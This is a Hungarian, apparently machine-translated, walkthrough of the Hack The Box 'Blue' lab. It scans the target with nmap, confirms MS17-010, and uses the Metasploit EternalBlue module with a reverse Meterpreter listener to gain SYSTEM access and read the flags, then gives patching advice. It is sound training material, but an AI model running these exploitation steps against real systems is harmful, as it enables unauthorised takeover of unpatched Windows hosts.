Őrizzétek meg nyugodtan és Hack the Box - kék

A Hack The Box (HTB) egy online platform, amely lehetővé teszi, hogy tesztelje penetrációs tesztelési képességeit.

Számos, folyamatosan frissülő kihívást tartalmaz. Néhányan a valós világ forgatókönyveit szimulálják, mások pedig inkább a CTF kihívásstílus felé hajlanak.

Megjegyzés : Csak nyugdíjas HTB gépek írása engedélyezett.

A kék a Hack The Box egyik legegyszerűbb gépe. De bemutatja az EternalBlue kihasználásának hatását, amelyet a vállalatok kompromisszumára használtak nagyszabású ransomware és crypto-bányászati ​​támadások révén.

A következő eszközökkel fogjuk zálogba dobni a Kali Linux dobozát:

  • nmap
  • searchsploit
  • metasploit
  • mérőóra

Kezdjük el.

Először hozzáadom a Kéket az / etc / hosts fájlhoz.

nano /etc/hosts

val vel

10.10.10.40 blue.htb

1. lépés - Felderítés

A gép kihasználása előtt az első lépés egy kis pásztázás és felderítés.

Ez az egyik legfontosabb rész, mivel ez fogja meghatározni, hogy mit próbálhat ki kihasználni utána. Mindig jobb, ha több időt töltünk erre a szakaszra, hogy minél több információt kapjunk.

Port szkennelés

Az Nmap-ot (Network Mapper) fogom használni . Az Nmap egy ingyenes és nyílt forráskódú segédprogram a hálózat felderítéséhez és a biztonsági auditáláshoz.

Nyers IP-csomagok segítségével határozza meg, hogy milyen gazdagépek érhetők el a hálózaton, milyen szolgáltatásokat kínálnak ezek a gazdagépek, milyen operációs rendszereket futtatnak, milyen típusú csomagszűrőket / tűzfalakat használnak, és tucatnyi egyéb jellemzőt.

Számos parancs használható ezzel az eszközzel a hálózat szkenneléséhez. Ha többet szeretne megtudni róla, itt megtekintheti a dokumentációt.

A következő parancsot használom intenzív vizsgálat végrehajtására:

nmap -A -v blue.htb

-A: Engedélyezi az operációs rendszer észlelését, a verzióészlelést, a szkript szkennelését és a nyomkövetési útvonalat

-v: Növeli a bőbeszédűséget

kék .htb: gazdagépnév a kék mezőhöz

Ha az eredményeket kissé túlságosan elsöprőnek találja, kipróbálhatja ezt:

nmap blue.htb

Láthatjuk, hogy elég sok nyitott port van, beleértve:

445. port , Microsoft-DS (Directory Services) SMB fájlmegosztás

Az nmap-vizsgálatból van néhány információ a számítógép nevéről (haris-PC) és az SMB verzióról (2.02).

A Server Message Block (SMB) egy hálózati protokoll, amely lehetővé teszi a felhasználók számára, hogy távoli számítógépekkel és kiszolgálókkal kommunikáljanak erőforrásaik felhasználása, vagy fájlok megosztása, megnyitása és szerkesztése érdekében.

Ennek a mezőnek a neve alapján, és arról, hogy ez egy Windows gép, nyitott 445-ös porttal, feltételezhetjük, hogy a gép sebezhető az EternalBlue számára. Nmap szkriptet használok az információk ellenőrzéséhez a következőkkel:

nmap --script vuln -p 445 blue.htb

Láthatjuk, hogy a doboz sérülékeny a Microsoft SMBv1 szerverek távoli kódfuttatással kapcsolatos biztonsági rései ellen (ms17-010).

2. lépés - Az ms17-010 megértése

Mi az ms17-010?

Az EternalBlue az Egyesült Államok Nemzetbiztonsági Ügynöksége (NSA) által kifejlesztett kiber támadás. A Shadow Brokers hackercsoport 2017. április 14-én szivárogtatta ki, egy hónappal azután, hogy a Microsoft kiadta a biztonsági rés javításait - Wikipedia

Bővebben itt olvashat. A biztonsági rést javítottuk, és a Microsoft Biztonsági Közlönyében MS17-010 néven szerepel.

Az EternalBlue lehetővé teszi a hackerek számára, hogy tetszőleges kódot távolról futtassanak, hogy hozzáférjenek a hálózathoz. Kihasználja a Windows OS SMB protokolljának sebezhetőségét. A kihasználás veszélyeztetheti a teljes hálózatot és a hozzá kapcsolódó eszközöket.

Az EternalBlue programot használó rosszindulatú programok terjedhetnek a hálózatok között. 2017-ben a WannaCry - egy kripto-ransomware - az EternalBlue kihasználást használta, amely az egész hálózaton átterjedt az összes csatlakoztatott eszközre.

3. lépés - Az EternalBlue kihasználása

A Searchsploit segítségével ellenőrizem, van-e ismert kihasználás. A Searchsploit az Exploit Database parancssori kereső eszköze.

A következő parancsot használom:

searchsploit eternalblue

További részleteket kaphatok egy kihasználásról:

searchsploit -x 41738.py

A kihasználás megkereséséhez ellenőrizheti az Exploit Database alkalmazást is.

Egy Metasploit modul áll rendelkezésre.

A Metasploit-ot fogjuk használni , amely egy penetrációs tesztelési keretrendszer, amely egyszerűvé teszi a hackelést. Ez elengedhetetlen eszköz sok támadó és védő számára.

Elindítom a Metasploit keretrendszert Kalin, és megkeresem a parancsot, amelyet használnom kell a kihasználáshoz.

Ne felejtse el frissíteni a Metasploit programot, amikor elindítja ezt a parancsot:

msfupdate

Segédprogram segítségével ellenőrizheti azt is, hogy a célpont sebezhető-e az EternalBlue számára a Metasploiton. Kezdje ezzel a paranccsal:

search eternalblue

akkor abban az esetben

use 1

kiválaszt

auxiliary/scanner/smb/smb_ms17_010

Ellenőrizheti a lehetőségeket a

show options

és állítsa be a RHOSTS elemet

set RHOSTS blue.htb

Ezután futtassa a segédgombot a

run

Láthatja, hogy a gazdagép valószínűleg sebezhető az MS17-010 iránt!

Most ellenőrizzük a kihasználást

use 2

vagy a parancs

exploit/windows/smb/ms17_010_eternalblue

Be kell állítanunk a RHOSTS lehetőségeit

és a LHOST - az enyém 10.10.14.24 volt. Be kell állítania a saját LHOST-jával. Itt ellenőrizheti a sajátját.

Az exploit futtatása előtt itt ellenőrizheti, hogy a gép sérülékeny-e - ez futtatja a korábban használt segédprogramot a paranccsal

check

Ezután futtatom a kihasználást

run

A kihasználást többször kellett futtatni, mielőtt kaptam egy Meterpreter munkamenetet.

Itt van az offenzív biztonsági mérő definíciója:

A Meterpreter egy fejlett, dinamikusan bővíthető hasznos teher, amely a memóriában lévő DLL injekciós szakaszokat használja, és futás közben kiterjesztésre kerül a hálózaton. Az átmeneti socketen keresztül kommunikál, és átfogó ügyféloldali Ruby API-t biztosít. Jellemzi a parancsok előzményeit, a fülek kiegészítését, a csatornákat és egyebeket.

A Meterpreterről itt olvashat bővebben.

Kezdjük azzal, hogy összegyűjtünk néhány információt.

A getuid visszaadja a hívási folyamat valódi felhasználói azonosítóját.

Az NT Authority \ SYSTEM vagy a LocalSystem fiók egy beépített Windows-fiók. Ez a leghatékonyabb fiók egy Windows helyi példányon. Rendszergazdai hozzáféréssel rendelkezünk azon a gépen.

4. lépés - A user.txt jelző keresése

A dokumentumok és beállítások menüből navigálok a haris mappába .

Az összes fájlt / mappát a következő paranccsal tudom felsorolni:

ls -la

Ezután lépjen a Desktop és

cd Desktop

És megtalálom a felhasználói zászlót! Ezzel ellenőrizhetem a fájl tartalmát

cat user.txt

5. lépés - A root.txt zászló keresése

Most keressük meg a gyökérzászlót. Fel navigálok a Felhasználók oldalra, és bejelentkezem az Adminisztrátor / Asztal mappába. Megtalálom a zászlót!

A következő paranccsal látom a fájl tartalmát:

cat root.txt

Gratula! Megtalálta mindkét zászlót.

Javítások

  • Csatlakoztassa eszközeit a Microsoft Windows SMB v1 biztonsági frissítéséhez. Ellenőrizheti a Microsoft Biztonsági Értesítőjét, hogy mely operációs rendszereket érinti
  • Tiltsa le az SMB v1 szolgáltatást, és használja az SMB v2 vagy v3 szoftvert
  • Alkalmazza a legkisebb jogosultság elvét minden rendszerére és szolgáltatására

Kérjük, ne habozzon kommentálni, kérdéseket feltenni vagy megosztani barátaival :)

A Nyugodj meg és hackeldoboz sorozatból további cikkeket láthatsz itt.

Kövess engem a Twitteren vagy a LinkedIn-en.

És ne felejtsd el # GetSecure , # BeSecure és # StaySecure !